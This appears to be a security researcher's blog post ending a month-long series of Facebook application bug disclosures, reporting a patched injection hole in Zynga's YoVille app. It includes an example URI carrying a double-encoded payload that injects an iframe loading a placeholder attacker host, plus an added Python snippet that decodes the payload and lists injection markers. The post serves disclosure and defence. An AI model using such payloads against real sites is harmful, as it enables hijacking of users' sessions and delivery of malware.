We’ve come to the end of the Month of Facebook Bugs – today’s post marks the last published FAXX Hack for September. The series began with a vulnerability in the no. 1 Facebook application, FarmVille from Zynga. Today we end with a very similar hole in another major Zynga application, discovered about two weeks ago.
I have much to cover in recapping this month, and it will likely take a few days to put everything together. I plan on posting a full report that includes statistics and more detailed explanations on how some of these hacks work. Also, as promised, I intend to post demonstration code showing how these holes can be exploited to access user information and spread virally, in addition to standard XSS issues, such as delivering malware.
Thanks for your interest in the Month of Facebook Bugs, and please stay tuned for the upcoming final report.
Facebook Verified Application
Current Monthly Active Users: 17,944,265
Current Rank on Application Leaderboard: 9
Application Developer: Zynga
Responsiveness: Zynga has been one of the most responsive developers I contacted. They replied quickly and patched the hole soon after.
Vulnerability Status: Patched
Example URI: http://apps.facebook.com/yoville/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F
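To see what the Example URI above actually carries, here is an added example (not code from the original post or from Zynga/Facebook) that peels back the nested URL-encoding layers of the `type` parameter, flags the injected FBML, and contrasts an unescaped reflection with an HTML-escaped one; the href attribute as reflection context is an assumption, since the post does not say how YoVille echoed the parameter.

```python
"""Decode the `type` parameter from the post's Example URI, show the nested
URL-encoding layers, and contrast an unescaped reflection with an escaped one.
Added example, not code from the original post or from Zynga/Facebook; the
reflection context (an href attribute) is an assumption, since the post does
not say how YoVille echoed the parameter."""
from html import escape
from urllib.parse import unquote_plus, urlsplit

# Example URI copied from the post; EVILURI is the post's own placeholder.
EXAMPLE_URI = ("http://apps.facebook.com/yoville/index.php?type=%22%2F%253E%253C"
               "fb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22"
               "http%3A%2F%2FEVILURI%2F")

# Markers whose appearance after decoding indicates FBML/HTML injection.
INJECTION_MARKERS = ("<fb:", "<script", "<iframe", "javascript:")


def type_param(uri: str) -> str:
    """Return the still-encoded `type` query parameter from the URI."""
    for pair in urlsplit(uri).query.split("&"):
        key, _, val = pair.partition("=")
        if key == "type":
            return val
    return ""


def decode_layers(value: str, max_layers: int = 5) -> list:
    """URL-decode repeatedly until the value stops changing; return each layer."""
    layers = [value]
    for _ in range(max_layers):
        nxt = unquote_plus(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers


def looks_like_injection(value: str) -> bool:
    """True if any decoding layer contains a marker (catches double-encoding)."""
    return any(m in layer.lower() for layer in decode_layers(value) for m in INJECTION_MARKERS)


def reflect_unsafe(value: str) -> str:
    """Vulnerable pattern (assumed): reflect the once-decoded value into an attribute as-is."""
    return '<a href="index.php?type=%s">' % unquote_plus(value)


def reflect_safe(value: str) -> str:
    """Hardened pattern: HTML-escape quotes and angle brackets before reflecting."""
    return '<a href="index.php?type=%s">' % escape(unquote_plus(value), quote=True)
```

The second decoding layer is where the `"/><fb:iframe src="` breakout becomes visible, which is why a filter that decodes only once misses it while output escaping at reflection time does not.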